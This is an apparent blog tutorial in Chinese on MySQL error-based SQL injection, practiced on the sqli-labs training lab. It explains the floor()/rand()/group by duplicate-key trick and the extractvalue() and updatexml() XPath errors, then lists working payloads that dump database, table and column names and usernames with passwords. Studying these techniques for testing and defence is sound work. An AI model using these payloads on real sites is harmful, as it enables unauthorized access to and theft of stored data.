SQL 报错注入详解

r囧r小猫 2023-09-27 20:03 151阅读 0赞

## 一、报错注入详解 ##

近期学习 SQL 报错注入，本篇文章为关于报错注入的一些个人理解，如有错误，希望指出 本文使用 sqli-labs 数据库作为示例

### 1、十种报错注入： ###

报错注入方式有很多，其中比较常见的有 floor() 、extractvalue() 、updatexml() 三种，本篇文章主要对这三种进行分析

### 2、floor() ###

#### 2.1、payload 分析 ####

先贴上一个常见的 payload 再进行分析 (sqli-labs Less-5)

' union select 1,count(*),concat(floor(rand(0)*2),database())x from `users` group by x %23

复制

![658722c98a46615a19f2495e577d988a.png][]

首先这个 payload 和网上很多的不太一样，查阅网上相关博客时发现大多数的 payload 都是这样写的

' union select 1,2,3 from (select count(*),concat(floor(rand(0)*2),database())x from `users` group by x)a %23

复制

这个就是把发生报错的 select 作为一个子查询，外面有一个 `select 1,2,3 from 子查询` (1,2,3 是为了与union 前面的字段数保持一致，上面的 payload 多加了一个 1，也是同理)

这里的 payload 可能是考虑到 MySQL Group By 中 Select 指定的字段限制，在select指定的字段要么就要包含在Group By 语句的后面，作为分组的依据；要么就要被包含在聚合函数中。比如说下面的这个例子

![656781e610d20768845bc00f6773f481.png][]

group by 后面字段没有 password，所以 select 后面就不能写 password

![6704322282643b20d24c703d010f414e.png][]

但是写常数就可以

![666d6a617bdddc94eaef47f0c06b4716.png][]

接下来回到第一个 payload 的解释，首先了解两个函数

1.  floor() ：向下取整
2.  rand() ：
    
     *  没有种子值，产生一个 \[0,1) 的随机数
    
    ![dfc7fa6bddc01dda198bdec7962cd569.png][]
    
    产生结果每次都不同
    
     *  如果指定了seed，则返回可重复的随机数序列。
    
    ![345ca41aa8070f2cc95249045e62793b.png][]
    
    当 seed=0 时，每次都按照这个顺序产生随机数

然后 `floor(rand(0)*2)` 的目的就应该清楚了，为了产生固定顺序的 0 、1 数

产生这些 0 1数有什么用处呢？接下来就与 MySQL 的 group by 有关了

先把 payload 中关键的部分，也就是发生报错的 select 语句粘到 sqlyog 中执行一下，发现报错信息是 “Duplicate entry ‘1security’ for key ‘<group\_key>’ ”，就是主键重复，主键必须是非空且不能重复的。

![622b259ea825560428e81322d9a11db8.png][]

group by key 的原理是循环读取数据的每一行，将结果保存于临时表中。读取每一行的 key 时，如果 key 存在于临时表中，则不在临时表中更新临时表的数据；如果 key 不在临时表中，则在临时表中插入 key 所在行的数据。

这个临时表的主键就是 group by 后面的字段 x ，x 仅仅是 `concat(floor(rand(0)*2),database())` 的别名，这样我们就基本弄清报错的原因了，其原因主要是因为临时表的主键 x 重复。在这里 group by 要对 x 进行两次运算，也就是要调用两次 rand(0) ，第一次是拿 group by 后面的字段值到临时表中去对比前，首先获取group by后面的值，这时用 `concat(floor(rand(0)*2),database())` 计算出第一个 x 值；第二次是用 group by 后面的字段的值在临时表中查找，如果存在于表中，就不需要更改临时表，如果不存在与临时表中，那就需要把它插入到临时表中，这里在插入时会进行第二次运算，由于 rand() 函数存在一定的随机性，所以第二次运算的结果可能与第一次运算的结果不一致，但是这个运算的结果可能在临时表中已经存在了，那么这时的插入必然导致主键的重复，进而引发错误。

为什么要有聚集函数 `count(*)` ？

如果没有聚集函数 `count(*)` ，经过测试并不报错

![c73bc226609b24a2fe40fab932bee3bf.png][]

至于原因，我也查找了很多关于 group by 的实现原理，感觉都不能很好的解释，所以这里又是一个未解决的问题。（上面的 group by 原理来源于参考文章，是否正确有待验证。）

用上面的 payload `concat(floor(rand(0)*2),database())` 来举例，floor(rand(0)\*2) 产生的前五个数一定为01101，后面再拼接上 database()，这个是固定值，先不用管。接下来模拟下 group by 过程，遍历 users 表第一行时，先计算出一个 x=0security，查临时表，不存在，再次计算 x 然后插入 x=1security；遍历到第二行，计算出一个 x=1security，临时表中已经存在，继续遍历；遍历到第三行，计算出一个 x=0security，发现表中没有，再次计算 x 然后插入 x=1security，因为刚才已经插入过一个 1security，所以这时就发生主键重复。然后把 1security 作为报错信息输出，攻击者便可得到相关信息。

#### 2.2、Less-5 示例 ####

payload：

#爆库名：( database() 或 (select database()) )
    ' union select 1,count(*),concat(floor(rand(0)*2),database())x from information_schema.tables group by x%23
    
    #爆表名：(网上有博客说不能使用 group_concat 拼接，但是在 sqli-labs Less-5 测试可以使用。如果不能使用的话，可以使用 limit)
    ' union select 1,count(*),concat(floor(rand(0)*2),(select group_concat(table_name) from information_schema.tables where table_schema="security"))x from information_schema.tables group by x%23
    
    #爆列名：（where 后面有两个判断条件：库名和表名，避免不同库中有相同表名，造成查询出来的数据混乱）
    ' union select 1,count(*),concat(floor(rand(0)*2),(select group_concat(column_name) from information_schema.columns where table_name="users" and table_schema="security"))x from information_schema.tables group by x%23
    
    #爆数据：
    ' union select 1,count(*),concat(floor(rand(0)*2),(select concat(username,0x7e,password) from `users` limit 0,1))x from information_schema.tables group by x%23

复制

最后**爆数据的 payload 的确不能使用 group\_concat** ，把 SQL 语句拿到 sqlyog 执行，确实没有报错，正常返回了两类拼接后的数据，正常来说 rand(0) 的执行次数应该取决于最后一个 from 的表的行数（information\_schema.tables）

![a41d7ce930280c798b5251adfc64e20c.png][]

至于为什么，研究了半天没搞懂，有知道的同学可以帮忙解释一下，非常感谢！

爆库名：

![b4593a47b02340951bafc957da5c85ac.png][]

爆表名：

![fc094fd27fa09850e288c3343c3d1cba.png][]

爆列名：

![ddb32725eb50c8bdc7b527647e1498e2.png][]

爆数据：

![71d175c3b0844a04172c7edf4fe93263.png][]

### 3、extractvalue() 、updatexml() ###

从 mysql5.1.5 开始提供两个 XML 查询和修改的函数，extractvalue 和 updatexml。extractvalue 负责在 xml 文档中按照 xpath 语法查询节点内容，updatexml 则负责修改查询到的内容:

*  extractvalue (XML\_document, XPath\_string)：从目标 XML中 返回包含所查询值的字符串 第一个参数：XML\_document 是 String 格式，为 XML 文档对象的名称 第二个参数：XPath\_string (Xpath格式的字符串) ，如果不了解 Xpath 语法，可以在网上查找教程。
 *  updatexml (XML\_document, XPath\_string, new\_value)：改变文档中符合条件的节点的值 第一个参数：XML\_document 是 String 格式，为 XML 文档对象的名称 第二个参数：XPath\_string (Xpath格式的字符串) ，如果不了解 Xpath 语法，可以在网上查找教程。 第三个参数：new\_value，String 格式，替换查找到的符合条件的数据

mysql> select extractvalue(1,'/a/b');
    +------------------------+
    | extractvalue(1,'/a/b') |
    +------------------------+
    |                        |
    +------------------------+
    1 row in set (0.01 sec)

复制

它们的第二个参数都要求是符合xpath语法的字符串，如果不满足要求，则会报错，并且将查询结果放在报错信息里：

mysql> select updatexml(1,concat(0x7e,(select @@version),0x7e),1);
    ERROR 1105 (HY000): XPATH syntax error: '~5.7.17~'
    mysql> select extractvalue(1,concat(0x7e,(select @@version),0x7e));
    ERROR 1105 (HY000): XPATH syntax error: '~5.7.17~'

复制

payload：

1.extractvalue()
    #爆库名：
    ' and(select extractvalue(1,concat(0x7e,(select database()))))
    
    #爆表名：
    ' and(select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))))
    
    #爆列名：
    ' and(select extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="TABLE_NAME"))))
    
    #爆数据：
    ' and(select extractvalue(1,concat(0x7e,(select group_concat(COIUMN_NAME) from TABLE_NAME))))
    
    
    2.updatexml()
    #爆库名：
    ' and(select updatexml(1,concat(0x7e,(select database())),0x7e))
    
    #爆表名：
    ' and(select updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database())),0x7e))
    
    #爆列名：
    ' and(select updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name="TABLE_NAME")),0x7e))
    
    #爆数据：
    ' and(select updatexml(1,concat(0x7e,(select group_concat(COLUMN_NAME)from TABLE_NAME)),0x7e))

复制

*  `~` 可以换成 `#` 、`$` 等不满足 xpath 格式的字符
 *  extractvalue() 能查询字符串的最大长度为 32，如果我们想要的结果超过 32，就要用 substring() 函数截取或 limit 分页，一次查看最多 32 位
 *  注意这里使用 concat 时，必须要把 database() 等注入语句写到不符合 xpath 的后面（例如 0x7e），因为报错时，从不符合的位置开始输出 例如可以写：CONCAT(0x7e,DATABASE(),0x7e) 或 CONCAT(0x7e,DATABASE())

[658722c98a46615a19f2495e577d988a.png]: https://img-blog.csdnimg.cn/img_convert/658722c98a46615a19f2495e577d988a.png
[656781e610d20768845bc00f6773f481.png]: https://img-blog.csdnimg.cn/img_convert/656781e610d20768845bc00f6773f481.png
[6704322282643b20d24c703d010f414e.png]: https://img-blog.csdnimg.cn/img_convert/6704322282643b20d24c703d010f414e.png
[666d6a617bdddc94eaef47f0c06b4716.png]: https://img-blog.csdnimg.cn/img_convert/666d6a617bdddc94eaef47f0c06b4716.png
[dfc7fa6bddc01dda198bdec7962cd569.png]: https://img-blog.csdnimg.cn/img_convert/dfc7fa6bddc01dda198bdec7962cd569.png
[345ca41aa8070f2cc95249045e62793b.png]: https://img-blog.csdnimg.cn/img_convert/345ca41aa8070f2cc95249045e62793b.png
[622b259ea825560428e81322d9a11db8.png]: https://img-blog.csdnimg.cn/img_convert/622b259ea825560428e81322d9a11db8.png
[c73bc226609b24a2fe40fab932bee3bf.png]: https://img-blog.csdnimg.cn/img_convert/c73bc226609b24a2fe40fab932bee3bf.png
[a41d7ce930280c798b5251adfc64e20c.png]: https://img-blog.csdnimg.cn/img_convert/a41d7ce930280c798b5251adfc64e20c.png
[b4593a47b02340951bafc957da5c85ac.png]: https://img-blog.csdnimg.cn/img_convert/b4593a47b02340951bafc957da5c85ac.png
[fc094fd27fa09850e288c3343c3d1cba.png]: https://img-blog.csdnimg.cn/img_convert/fc094fd27fa09850e288c3343c3d1cba.png
[ddb32725eb50c8bdc7b527647e1498e2.png]: https://img-blog.csdnimg.cn/img_convert/ddb32725eb50c8bdc7b527647e1498e2.png
[71d175c3b0844a04172c7edf4fe93263.png]: https://img-blog.csdnimg.cn/img_convert/71d175c3b0844a04172c7edf4fe93263.png